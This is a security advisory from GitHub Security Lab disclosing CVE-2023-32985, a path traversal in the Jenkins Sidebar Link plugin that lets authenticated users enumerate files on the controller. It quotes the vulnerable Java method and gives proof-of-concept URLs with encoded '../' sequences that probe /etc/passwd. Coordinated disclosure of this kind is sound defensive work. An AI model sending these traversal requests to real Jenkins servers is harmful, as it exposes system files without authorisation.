GHSL-2023-076: Information disclosure in the Sidebar Link Plug-in for Jenkins - CVE-2023-32985

Coordinated Disclosure Timeline

• 2023-04-13: Issue reported to the Jenkins Security Team.
• 2023-05-16: Issue is fixed and advisory publish.

Summary

Sidebar Link Plug-in for Jenkins 2.2.1 and earlier does not restrict a file path parameter in an HTTP endpoint, allowing authenticated attackers to enumerate arbitrary files on the Jenkins controller file system.

Product

Sidebar Link Plug-in for Jenkins

Tested Version

2.2.1

Details

Filesystem enumeration in SidebarLinkPlugin.java (GHSL-2023-076)

The Sidebar Link Jenkins plugin implements an HTTP endpoint doCheckLinkIcon that receives a value parameter. This parameter is used to build a filesystem path in the Jenkins controller, and check for its existence:

src/main/java/hudson/plugins/sidebar_link/SidebarLinkPlugin.java:137

public FormValidation doCheckLinkIcon(@QueryParameter String value) {
    if (StringUtils.isBlank(value)) {
        return FormValidation.warning("The provided icon is blank or empty. Default will be used.");
    } else
        // do not validate if default icon is used
        if (!value.equals(LinkAction.DEFAULT_ICON_NAME)) {
          FilePath imageFile = Jenkins.get().getRootPath().child(value);
          try {
              if (!imageFile.exists()) {
                  return FormValidation.error("Image does not exist:  " + imageFile);
              }
          } catch (Exception e) {
              return FormValidation.error(e, "Problem with link icon:  " + value);
          }
      }
    return FormValidation.ok();
}

Since there is no validation performed on the parameter, it can contain .. sequences to escape the intended Jenkins root path directory. The plugin shows a different message depending on the file existing or not, which allows attackers to enumerate the controller filesystem by sending multiple requests with different paths and filenames.

Impact

This issue may lead to information disclosure.

PoC

To exploit this issue, attackers could make GET requests to the checkLinkIcon endpoint containing the desired paths to be enumerated.

Example of a negative request: http://localhost:8080/jenkins/job/test/descriptorByName/hudson.plugins.sidebar_link.SidebarLinkPlugin/checkLinkIcon?value=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/b

Response: Image does not exist:  /etc/b

Example of a positive request: http://localhost:8080/jenkins/job/test/descriptorByName/hudson.plugins.sidebar_link.SidebarLinkPlugin/checkLinkIcon?value=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

Response: HTTP 200 OK

CVE

• CVE-2023-32985

Resources

• SECURITY-3125

Credit

This issue was discovered and reported by CodeQL team member @atorralba (Tony Torralba).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-076 in any communication regarding this issue.